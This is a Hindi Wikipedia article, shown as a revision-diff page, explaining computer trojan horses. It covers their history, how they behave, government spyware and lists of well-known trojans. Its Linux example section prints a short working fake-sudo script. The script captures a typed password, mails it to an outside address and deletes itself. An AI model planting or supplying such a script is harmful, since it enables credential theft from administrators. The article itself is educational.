ट्रोजन हॉर्स (कंप्यूटिंग): Difference between revisions
Line 41: | Line 41: | ||
|url-status=dead| archive-url=https://web.archive.org/web/20130506102113/http://www.ejpd.admin.ch/content/ejpd/de/home/themen/sicherheit/ueberwachung_des_post-/faq_vuepf.faq_3.html| archive-date=May 6, 2013}}</ref> गोववेयर ट्रोजन के उदाहरणों में स्विस [[स्पाइवेयर|मिनीपैंजर और मेगापैंजर]] <ref name="tech">{{cite web|last1=Dunn|first1=John|title=स्विस कोडर सरकारी जासूस ट्रोजन का प्रचार करता है|url=http://news.techworld.com/security/3200593/swiss-coder-publicises-government-spy-trojan/|website=[[International Data Group|TechWorld]] |access-date=10 January 2021|archive-url=https://archive.today/20140126115729/http://news.techworld.com/security/3200593/swiss-coder-publicises-government-spy-trojan/|archive-date=26 January 2014|date=27 August 2009|url-status=dead}}{{cbignore|bot=InternetArchiveBot}}</ref> और [[स्पाइवेयर|जर्मन "राज्य ट्रोजन"]] [[स्पाइवेयर|उपनाम R2D2]] शामिल है। <ref name="cupa" />जर्मन गोववेयर आम जनता के लिए अज्ञात सुरक्षा अंतराल का दोहन करके और अन्य अनुप्रयोगों के माध्यम से एन्क्रिप्ट किए जाने से पहले स्मार्टफोन डेटा तक पहुंचने का काम करता है। <ref>{{Cite web |title = जर्मन संघीय पुलिस फोन एन्क्रिप्शन से बचने के लिए ट्रोजन वायरस का उपयोग करती है|url = http://www.dw.com/en/german-federal-police-use-trojan-virus-to-evade-phone-encryption/a-42328466| website = [[Deutsche Welle|DW]] | access-date = 2018-04-14}}</ref> | |url-status=dead| archive-url=https://web.archive.org/web/20130506102113/http://www.ejpd.admin.ch/content/ejpd/de/home/themen/sicherheit/ueberwachung_des_post-/faq_vuepf.faq_3.html| archive-date=May 6, 2013}}</ref> गोववेयर ट्रोजन के उदाहरणों में स्विस [[स्पाइवेयर|मिनीपैंजर और मेगापैंजर]] <ref name="tech">{{cite web|last1=Dunn|first1=John|title=स्विस कोडर सरकारी जासूस ट्रोजन का प्रचार करता है|url=http://news.techworld.com/security/3200593/swiss-coder-publicises-government-spy-trojan/|website=[[International Data Group|TechWorld]] |access-date=10 January 2021|archive-url=https://archive.today/20140126115729/http://news.techworld.com/security/3200593/swiss-coder-publicises-government-spy-trojan/|archive-date=26 January 2014|date=27 August 2009|url-status=dead}}{{cbignore|bot=InternetArchiveBot}}</ref> और [[स्पाइवेयर|जर्मन "राज्य ट्रोजन"]] [[स्पाइवेयर|उपनाम R2D2]] शामिल है। <ref name="cupa" />जर्मन गोववेयर आम जनता के लिए अज्ञात सुरक्षा अंतराल का दोहन करके और अन्य अनुप्रयोगों के माध्यम से एन्क्रिप्ट किए जाने से पहले स्मार्टफोन डेटा तक पहुंचने का काम करता है। <ref>{{Cite web |title = जर्मन संघीय पुलिस फोन एन्क्रिप्शन से बचने के लिए ट्रोजन वायरस का उपयोग करती है|url = http://www.dw.com/en/german-federal-police-use-trojan-virus-to-evade-phone-encryption/a-42328466| website = [[Deutsche Welle|DW]] | access-date = 2018-04-14}}</ref> | ||
हैकर्स के बीच [[बोटनेट]] की लोकप्रियता और विज्ञापन सेवाओं की उपलब्धता के कारण, जो लेखकों को अपने उपयोगकर्ताओं की गोपनीयता का उल्लंघन करने की अनुमति देते हैं, ट्रोजन अधिक आम होते जा रहे हैं। [[BitDefender|बिटडिफेंडर]] द्वारा जनवरी से जून 2009 तक किए गए एक सर्वेक्षण के अनुसार, "ट्रोजन-प्रकार के मैलवेयर बढ़ रहे हैं, जो दुनिया में पाए गए वैश्विक मैलवेयर का 83% हिस्सा हैै।" ट्रोजन का कीड़ों से संबंध है, क्योंकि वे कीड़ों की मदद से फैलते हैं और उनके साथ इंटरनेट पर यात्रा करते हैं।<ref>{{cite web |title=बिटडिफेंडर मालवेयर और स्पैम सर्वेक्षण ई-खतरे को ऑनलाइन व्यवहार प्रवृत्तियों के अनुकूल पाता है|url=http://news.bitdefender.com/NW1094-en--BitDefender-Malware-and-Spam-Survey-finds-E-Threats-Adapting-to-Online-Behavioral-Trends.html |website=[[Bitdefender|BitDefender]] |access-date=2020-03-27 |archive-url=https://web.archive.org/web/20090808080907/http://news.bitdefender.com/NW1094-en--BitDefender-Malware-and-Spam-Survey-finds-E-Threats-Adapting-to-Online-Behavioral-Trends.html |archive-date=2009-08-08 |url-status=dead}}</ref> बिटडिफेंडर ने कहा है कि लगभग 15% परिकलक एक बॉटनेट के सदस्य हैं, आमतौर पर ट्रोजन संक्रमणों द्वारा भर्ती किए जाते हैं।<ref>{{cite web | |||
|last=Datta | |last=Datta | ||
|first=Ganesh | |first=Ganesh |
Revision as of 22:25, 21 March 2023
एक श्रृंखला का हिस्सा |
कंप्यूटर हैकिंग |
---|
संगणना में, एक ट्रोजन हॉर्स कोई भी मैलवेयर है जो उपयोगकर्ताओं को उसके वास्तविक इरादे के बारे में गुमराह करता है। यह शब्द भ्रामक ट्रोजन हॉर्स की प्राचीन ग्रीक कहानी से लिया गया है ,जिसके कारण ट्रॉय शहर का पतन हुआ।[1][2][3][4][5]
ट्रोजन आमतौर पर सामाजिक अभियान्त्रिकी के किसी रूप के माध्यम से फैलते हैं; उदाहरण के लिए, जहाँ एक उपयोगकर्ता को सहज दिखने के लिए एक इमेल संबद्धता निष्पादित करने में धोखा दिया जाता है (उदाहरण के लिए, एक नियमित फॉर्म भरने के लिए), या सामाजिक संचार माध्यम पर या अन्य जगहों पर एक नकली विज्ञापन पर क्लिक करके। हालांकि उनका पेलोड कुछ भी हो सकता है, कई आधुनिक रूप गुप्तद्वार के रूप में कार्य करते हैं ,एक नियंत्रक से संपर्क करते हैं जो प्रभावित परिकलक पर अनाधिकृत पहुंच प्राप्त कर सकते हैं।[6] रैंसमवेयर हमले अक्सर ट्रोजन का उपयोग करके किए जाते हैं।
परिकलक वायरस और वर्म्स के विपरीत, ट्रोजन आमतौर पर खुद को अन्य दस्तावेजों में इंजेक्ट करने की कोशिश नहीं करते हैं या अन्यथा खुद को प्रचारित नहीं करते हैं।[7]
शब्द का प्रयोग
यह स्पष्ट नहीं है कि कब और कहाँ अवधारणा, और इसके लिए शब्द का पहली बार उपयोग किया गया था,लेकिन 1971 तक पहले यूनिक्स पुस्तिका ने मान लिया था कि इसके पाठक दोनों को जानते हैं:[8]
साथ ही, कोई भी अटल-उपभोगकर्ता-आईडी बिट ऑन के साथ दस्तावेज के स्वामी को नहीं बदल सकता है, अन्यथा कोई अन्य दस्तावेजों का दुरुपयोग करने में सक्षम ट्रोजन हॉर्स बना सकता है।
एक और प्रारंभिक संदर्भ 1974 में मॉलटिक्स परिकलक प्रणाली में भेद्यता विश्लेषण पर अमेरिकी वायु सेना की विवरणी में है।[9]
इसे केन थॉम्पसन द्वारा 1983 के अपने ट्यूरिंग पुरस्कार स्वीकृति व्याख्यान "रिफ्लेक्शंस ऑन ट्रस्टिंग ट्रस्ट" में लोकप्रिय बनाया गया था,[10] उपशीर्षक: किस हद तक एक कथन पर भरोसा करना चाहिए कि एक कार्यक्रम ट्रोजन हॉर्स से मुक्त है?
सॉफ्टवेयर लिखने वाले लोगों पर भरोसा करना शायद अधिक महत्वपूर्ण है। उन्होंने उल्लेख किया कि वे मालटिक्स की सुरक्षा पर एक विवरण से ट्रोजन के संभावित अस्तित्व के बारे में जानते थे।[11][12]
व्यवहार
एक बार अधिष्ठापित हो जाने पर, ट्रोजन विभिन्न प्रकार के दुर्भावनापूर्ण कार्य कर सकते हैं। कई अंतर्जाल पर एक या अधिक कमांड एंड कंट्रोल (C2) परिसेवक से संपर्क करते हैं और निर्देशो का इंतजार करते हैं। चूंकि व्यक्तिगत ट्रोजन आमतौर पर इस संचार के लिए बंदरगाहों के एक विशिष्ट सेट का उपयोग करते हैं, इसलिए उनका पता लगाना अपेक्षाकृत सरल हो सकता है। इसके अलावा, अन्य मैलवेयर संभावित रूप से दुर्भावनापूर्ण गतिविधि के लिए प्रॉक्सी के रूप में ट्रोजन का "अधिकार" कर सकते हैं।
जर्मन भाषी देशों में, सरकार द्वारा उपयोग किए जाने वाले या बनाए गए स्पाइवेयर को कभी-कभी गोववेयर कहा जाता है। गोववेयर आमतौर पर एक ट्रोजन सॉफ़्टवेयर है जिसका उपयोग लक्ष्य परिकलक से संचार को बाधित करने के लिए किया जाता है। स्विट्ज़रलैंड और जर्मनी जैसे कुछ देशों में ऐसे सॉफ़्टवेयर के उपयोग को नियंत्रित करने वाला एक कानूनी ढांचा है।[13][14] गोववेयर ट्रोजन के उदाहरणों में स्विस मिनीपैंजर और मेगापैंजर [15] और जर्मन "राज्य ट्रोजन" उपनाम R2D2 शामिल है। [13]जर्मन गोववेयर आम जनता के लिए अज्ञात सुरक्षा अंतराल का दोहन करके और अन्य अनुप्रयोगों के माध्यम से एन्क्रिप्ट किए जाने से पहले स्मार्टफोन डेटा तक पहुंचने का काम करता है। [16]
हैकर्स के बीच बोटनेट की लोकप्रियता और विज्ञापन सेवाओं की उपलब्धता के कारण, जो लेखकों को अपने उपयोगकर्ताओं की गोपनीयता का उल्लंघन करने की अनुमति देते हैं, ट्रोजन अधिक आम होते जा रहे हैं। बिटडिफेंडर द्वारा जनवरी से जून 2009 तक किए गए एक सर्वेक्षण के अनुसार, "ट्रोजन-प्रकार के मैलवेयर बढ़ रहे हैं, जो दुनिया में पाए गए वैश्विक मैलवेयर का 83% हिस्सा हैै।" ट्रोजन का कीड़ों से संबंध है, क्योंकि वे कीड़ों की मदद से फैलते हैं और उनके साथ इंटरनेट पर यात्रा करते हैं।[17] बिटडिफेंडर ने कहा है कि लगभग 15% परिकलक एक बॉटनेट के सदस्य हैं, आमतौर पर ट्रोजन संक्रमणों द्वारा भर्ती किए जाते हैं।[18]
लिनक्स उदाहरण
ट्रोजन हॉर्स एक ऐसी योजना है जो कुछ स्पष्ट कार्य करने का दावा करती है, फिर भी निष्पादन पर यह उपयोगकर्ता की सुरक्षा से समझौता करती है।[19] एक आसान योजना लिनक्स सुडो आदेश का नया संस्करण है। आदेश को तब सार्वजनिक रूप से लिखने योग्य निर्देशिका जैसे /tmp
में अनुकृति किया जाता है। यदि कोई व्यवस्थापक उस निर्देशिका में होता है और sudo
निष्पादित करता है, तो ट्रोजन हॉर्स को निष्पादित किया जा सकता है। यहाँ एक कार्यशील संस्करण है:
: # sudo # ---- # Turn off the character echo to the screen. stty -echo /bin/echo -n "Password for `whoami`: " read x /bin/echo "" # Turn back on the character echo. stty echo echo $x | mail -s "`whoami` password" outside@creep.com sleep 1 echo Sorry. rm $0 exit 0
आदेश प्रणाली आधारित ट्रोजन हॉर्सेस को रोकने के लिए, पथ प्रविष्टि= पर्यावरण चर पूंछ के अंत में स्थित होना चाहिए। उदाहरण के लिए: PATH=/usr/local/bin:/usr/bin:.
.
उल्लेखनीय उदाहरण
निजी और सरकारी
- एएनओएम - एफबीआई
- कैओस कंप्यूटर क्लब#Staatstrojaner|0zapftis / r2d2 StaatsTrojaner – DigiTask
- डार्ककॉमेट - सीआईए / एनएसए
- फिनफिशर - लेंच आईटी समाधान / गामा इंटरनेशनल
- हैकिंग टीम# उत्पाद और क्षमताएं | दा विंची / गैलीलियो आरसीएस - हैकिंग टीम
- जादू लालटेन (सॉफ्टवेयर) - एफबीआई
- 2020 यूनाइटेड स्टेट्स फेडरल गवर्नमेंट डेटा ब्रीच - फॉरेन इंटेलिजेंस सर्विस (रूस)आरामदायक भालू (संदिग्ध)
- जरूरत के हिसाब से एक्सेस ऑपरेशंस#क्वांटम अटैक|टीएओ क्वांटम/फॉक्सैसिड - एनएसए
- योद्धा गौरव - जीसीएचक्यू
सार्वजनिक रूप से उपलब्ध
- ईजीएबीटीआर - 1980 के दशक के अंत में
- नेटबस - 1998 (प्रकाशित)[20]
- मोबमैन द्वारा प्रभात - 1999 (प्रकाशित)
- पीछे का छिद्र - 1998 (प्रकाशित)
- बीस्ट (ट्रोजन हॉर्स) - 2002 (प्रकाशित)
- बिफ्रोस्ट (ट्रोजन हॉर्स) - 2004 (प्रकाशित)
- डार्ककॉमेट - 2008-2012 (प्रकाशित)
- ब्लैकहोल शोषण किट - 2012 (प्रकाशित)
- घोस्ट आरएटी - 2009 (प्रकाशित)
- मिनीपैंजर और मेगापैंजर - 2009 (प्रकाशित)[21][22]
- Leurak द्वारा MEMZ - 2016 (प्रकाशित)
सुरक्षा शोधकर्ताओं द्वारा पता लगाया
- बारह टोटके - 1990
- क्लिकबॉट.ए - 2006 (खोजा गया)
- ज़्यूस (ट्रोजन हॉर्स) - 2007 (खोजा गया)
- ट्रोजन बैकडोर। फ्लैशबैक - 2011 (खोजा गया)
- ज़ीरो एक्सेस बॉटनेट - 2011 (खोजा गया)
- कोबफेस - 2008 (खोजा गया)
- चोट - 2009 (खोजा गया)
- कोरफ्लड - 2010 (खोजा गया)
- टिनी बैंकर ट्रोजन - 2012 (खोजा गया)
- सोवा - 2022 (खोजा गया)[23]
- गवाह एंड्रॉइड मैलवेयर - 2015 (खोजा गया)[24][25]Cite error: Closing
</ref>
missing for<ref>
tag[26][27]
पूंजीकरण
परिकलक शब्द "ट्रोजन हॉर्स" प्राचीन शहर ट्रॉय के प्रसिद्ध ट्रोजन हॉर्स से लिया गया है। इस कारण "ट्रोजन" को अक्सर पूंजीकृत किया जाता है। हालाँकि, जबकि शैली निर्देश और शब्दकोश अलग-अलग होते हैं, कई लोग सामान्य उपयोग के लिए छोटे अक्षर "ट्रोजन" का सुझाव देते हैं।[28][29]
यह भी देखें
- कंप्यूटर सुरक्षा
- कोयल का अंडा (रूपक) | कोयल का अंडा (रूपक)
- साइबर जासूसी
- नाचने वाले सूअर
- शोषण (कंप्यूटर सुरक्षा)
- औद्योगिक जासूसी
- फ़िशिंग
- कम से कम विशेषाधिकार का सिद्धांत
- गोपनीयता-आक्रामक सॉफ्टवेयर
- दूरस्थ प्रशासन
- दूरस्थ प्रशासन सॉफ्टवेयर
- उल्टा कनेक्शन
- दुष्ट सुरक्षा सॉफ्टवेयर
- धोखाधड़ी करने वाले
- तकनीकी सहायता घोटाला
- कंप्यूटर वायरस और वर्म्स की समयरेखा
- ज़ोंबी (कंप्यूटर विज्ञान)
संदर्भ
- ↑ Landwehr, Carl E.; Alan R. Bull; John P. McDermott; William S. Choi (1993). कंप्यूटर प्रोग्राम सुरक्षा दोषों का एक वर्गीकरण, उदाहरण के साथ (PDF). DTIC Document. CiteSeerX 10.1.1.35.997. Archived from the original on April 8, 2013. Retrieved 2012-04-05.
- ↑ "ट्रोजन हॉर्स परिभाषा". Retrieved 2012-04-05.
- ↑ "ट्रोजन हॉर्स". Webopedia. Retrieved 2012-04-05.
- ↑ "ट्रोजन हॉर्स क्या है? - Whatis.com से परिभाषा". Retrieved 2012-04-05.
- ↑ "ट्रोजन हॉर्स: [एमआईटी-हैकर-टर्न-एनएसए-स्पूक डैन एडवर्ड्स द्वारा गढ़ा गया] एन।". Retrieved 2012-04-05.
- ↑ "वायरस, वर्म और ट्रोजन के बीच अंतर". Symantec Security Center. Broadcom Inc. Archived from the original on 2013-08-19. Retrieved 2020-03-29.
- ↑ "वायरस-एल/कंप.वायरस अक्सर पूछे जाने वाले प्रश्न (एफएक्यू) v2.00 (प्रश्न बी3: ट्रोजन हॉर्स क्या है?)". October 9, 1995. Archived from the original on August 5, 2020. Retrieved September 16, 2019.
- ↑ Thompson, Ken; Ritchie, Dennis M. "यूनिक्स प्रोग्रामर मैनुअल, 3 नवम्बर 1971" (PDF). Retrieved 28 March 2020.
- ↑ Karger, P.A.; Schell, R.R., "Multics Security Evaluation: Vulnerability Analysis , ESD-TR-74-193" (PDF), HQ Electronic Systems Division: Hanscom AFB, MA, II
- ↑ Ken Thompson (1984). "ट्रस्टिंग ट्रस्ट पर प्रतिबिंब". Commun. ACM. 27 (8): 761–763. doi:10.1145/358198.358210..
- ↑ Paul A. Karger; Roger R. Schell (2002), "Thirty Years Later: Lessons from the Multics Security Evaluation" (PDF), ACSAC: 119–126
- ↑ Karger et Schell wrote that Thompson added this reference in a later version of his Turing conference: Ken Thompson (November 1989), "On Trusting Trust.", Unix Review, 7 (11): 70–74
- ↑ 13.0 13.1 Basil Cupa, Trojan Horse Resurrected: On the Legality of the Use of Government Spyware (Govware), LISS 2013, pp. 419–428
- ↑ "अधिकतर पूछे जाने वाले सवाल". Federal Department of Justice and Police. Archived from the original on May 6, 2013.
- ↑ Dunn, John (27 August 2009). "स्विस कोडर सरकारी जासूस ट्रोजन का प्रचार करता है". TechWorld. Archived from the original on 26 January 2014. Retrieved 10 January 2021.
- ↑ "जर्मन संघीय पुलिस फोन एन्क्रिप्शन से बचने के लिए ट्रोजन वायरस का उपयोग करती है". DW. Retrieved 2018-04-14.
- ↑ "बिटडिफेंडर मालवेयर और स्पैम सर्वेक्षण ई-खतरे को ऑनलाइन व्यवहार प्रवृत्तियों के अनुकूल पाता है". BitDefender. Archived from the original on 2009-08-08. Retrieved 2020-03-27.
- ↑ Datta, Ganesh (2014-08-07). "ट्रोजन क्या होते हैं?". SecurAid. Archived from the original on 2014-08-12. Retrieved 2020-03-27.
- ↑ Wood, Patrick H.; Kochan, Stephen G. (1985). यूनिक्स प्रणाली सुरक्षा. Hayden Books. p. 42. ISBN 0-8104-6267-2.
- ↑ Seth, Kulakow (1998). "क्या यह अभी भी एक ट्रोजन हॉर्स या वास्तविक वैध रिमोट कंट्रोल एडमिनिस्ट्रेशन टूल है?" (Report). SANS Institute. Retrieved 2021-05-10.
- ↑ "मेगा पैंजर". SourceForge.
- ↑ "मिनी टैंक". SourceForge.
- ↑ "सोवा वायरस क्या है?". India Today.
- ↑ "ट्रोजनाइज्ड एडवेयर परिवार जो भी ऐप चाहता है उसे इंस्टॉल करने के लिए एक्सेसिबिलिटी सेवा का दुरुपयोग करता है - लुकआउट ब्लॉग".
- ↑ Neal, Dave (2015-11-20). "शेडुन ट्रोजन एडवेयर एंड्रॉइड एक्सेसिबिलिटी सर्विस को हिट कर रहा है". The Inquirer. Incisive Business Media. Archived from the original on 2015-11-22. Retrieved 2020-03-27.
{{cite web}}
: CS1 maint: unfit URL (link) - ↑ Times, Tech (November 9, 2015). "एंड्रॉइड मालवेयर का नया परिवार हटाना वस्तुतः असंभव है: शेडुन, शुएनेट और शिफ्टीबग को नमस्ते कहें".
- ↑ "एंड्रॉइड एडवेयर खुद को तब भी इंस्टॉल कर सकता है जब उपयोगकर्ता स्पष्ट रूप से इसे अस्वीकार कर दें". 2015-11-19.
- ↑ "ट्रोजन". Collins Advanced Dictionary. Retrieved 29 March 2020.
- ↑ "ट्रोजन हॉर्स". Microsoft Style Guide. Microsoft. Retrieved 29 March 2020.
बाहरी संबंध
- Media related to Trojan horse (malware) at Wikimedia Commons
- "CERT Advisory CA-1999-02 Trojan Horses" (PDF). Carnegie Mellon University Software Engineering Institute. Archived from the original on 2000-10-17. Retrieved 15 September 2019.